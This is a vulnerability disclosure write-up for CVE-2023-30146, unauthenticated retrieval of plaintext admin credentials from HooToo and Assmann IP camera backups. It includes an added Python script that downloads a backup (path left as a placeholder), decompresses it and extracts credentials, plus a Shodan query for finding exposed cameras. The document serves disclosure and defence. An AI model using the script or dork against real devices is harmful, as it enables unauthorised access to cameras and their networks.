L1-0 / CVE-2023-30146

Some Assmann manufactured IP-Cams leak the administrator password in their backup.


CVE-2023-30146 - Assmann/HooToo Webcam Exploit - Sensitive Data Exposure

Description

An issue was discovered in HooToo- and Assmann-branded IP cameras. The firmware stores the administrator and user credentials in plaintext in the device's settings backup. The backup can be retrieved and decompressed without authentication, giving a remote attacker the administrator credentials of the camera and, through it, access to the network it sits in.

Vulnerability Type

Sensitive Data Exposure

Attack Type

Remote

Impact

Possible network compromise

Background

Many of the IP cameras sold on the IoT market appear to be based on the HiSilicon Hi35xx SoC family [1]. The firmware running on these devices appears to be produced by Foscam (Shenzhen Foscam Intelligent Tech Co. Ltd), a large brand in the IP camera and IoT market. The cameras covered here were sold under the HooToo brand and under Assmann's DIGITUS "Plug & View" brand.

A note to the users

At the time of writing this write-up, over 800 IP cameras matching exactly these specifications are reachable from the internet and put their networks at risk. The real number is likely higher, since I only checked for HooToo- and Assmann-branded cameras. If you have one of the affected cameras in your network, make sure it cannot communicate with the internet, and consider replacing it with a newer device.

Proof of Concept

Note: There is a PoC script that is scheduled to be released one month after publication of this writeup.

The basic concept of this exploit is that an attacker directly visits the URL of the backup retrieval command [2] in the device's web interface, without logging in. This causes the camera to write a copy of its current settings into a compressed binary file, which can then be downloaded. The attacker decompresses the file and reads the credentials, which are stored in plaintext, and can then log in to the admin account. At that point the network should be considered breached.
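The following is an added example written for this write-up; it is not the author's PoC script. It shows the decompress-and-read step on a downloaded backup. The writeup does not document the backup format or the retrieval URL, so the code makes assumptions: it detects a few common compression containers by their magic bytes (gzip, zlib, bzip2, xz) and otherwise treats the blob as raw, and the retrieval path passed to fetch_backup() is a placeholder parameter, not the real command. The sample backup is constructed inline so the example runs offline.

```python
"""Triage a downloaded IP-camera settings backup for plaintext credentials.

Added example, not the writeup's PoC. Assumptions: the backup is one of a
few common compression formats (or uncompressed), and credentials appear as
key=value or key:value lines whose key names contain user/usr/pass/pwd.
"""
import bz2
import gzip
import lzma
import re
import zlib
from urllib.parse import urljoin
from urllib.request import urlopen

# Constructed sample settings file; the real layout is not documented here.
SAMPLE_SETTINGS = (
    b"\x00\x7f\xfe\x01" * 8  # binary header noise to exercise the scanner
    + b"[System]\n"
    b"hostname=ipcam\n"
    b"admin_user=admin\n"
    b"admin_pwd=Sup3rS3cret\n"
    b"[User]\n"
    b"user1=guest\n"
    b"user1_pwd=guest123\n"
    b"[DDNS]\n"
    b"ddns_user=\n"  # empty value: must not swallow the next line
    b"dns_server=192.0.2.53\n"
)
SAMPLE_BACKUP = gzip.compress(SAMPLE_SETTINGS)       # what the camera might serve
SAMPLE_BACKUP_ZLIB = zlib.compress(SAMPLE_SETTINGS)  # alternative container

# Key must contain a credential-ish token; value is one run of printable ASCII.
# Only horizontal whitespace is allowed around the separator, so an empty
# value cannot pull in the following line.
_CRED_RE = re.compile(
    rb"([A-Za-z0-9_.\-]*(?:user|usr|pass|pwd)[A-Za-z0-9_.\-]*)[ \t]*[=:][ \t]*([\x21-\x7e]+)",
    re.IGNORECASE,
)


def decompress_backup(blob: bytes) -> bytes:
    """Return the decompressed settings, detecting the container by magic bytes."""
    if blob[:2] == b"\x1f\x8b":  # gzip
        return gzip.decompress(blob)
    if blob[:3] == b"BZh":  # bzip2
        return bz2.decompress(blob)
    if blob[:6] == b"\xfd7zXZ\x00":  # xz
        return lzma.decompress(blob)
    # zlib: CMF byte 0x78 and (CMF*256 + FLG) divisible by 31
    if len(blob) >= 2 and blob[0] == 0x78 and (blob[0] * 256 + blob[1]) % 31 == 0:
        return zlib.decompress(blob)
    return blob  # assume uncompressed


def find_credentials(settings: bytes) -> list[tuple[str, str]]:
    """Scan raw settings bytes for plaintext credential-like key/value pairs."""
    found: list[tuple[str, str]] = []
    for m in _CRED_RE.finditer(settings):
        pair = (m.group(1).decode("ascii"), m.group(2).decode("ascii"))
        if pair not in found:
            found.append(pair)
    return found


def fetch_backup(base_url: str, backup_path: str, timeout: float = 10.0) -> bytes:
    """Download the backup blob. backup_path is a placeholder: the real
    retrieval command is not reproduced in this example."""
    with urlopen(urljoin(base_url, backup_path), timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    for key, value in find_credentials(decompress_backup(SAMPLE_BACKUP)):
        print(f"{key} = {value}")
```

Run against a real download by replacing SAMPLE_BACKUP with the bytes returned by fetch_backup(); the scanner is deliberately loose and will surface some non-credential keys, which is the right trade-off when triaging an undocumented format.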

Disclosure Timeline

  • 06 Apr 2022: Initial find on Shodan and further research
  • 22 Nov 2022: PoC writing & research into vendors
  • 12 Jan 2023: Initial contact w/ new vendor "Assmann"
  • 13 Jan 2023: New vendor response "Cameras are EOL."
  • 07 Mar 2023: Contact w/ vendor to get status update
  • 08 Mar 2023: New vendor response "In contact with engineers. Takes time because of lockdown in China."
  • 23 Mar 2023: CVE requested at MITRE
  • 05 May 2023: CVE assigned: CVE-2023-30146 [3]
  • 08 Jun 2023: Contact w/ vendor to get status update / no response
  • 03 Aug 2023: Public disclosure

References and Links

Shodan.io dork (HooToo/Assmann):

server: thttpd/2.25b 29dec2003 html:"ipCAM" http.component:"jQuery"
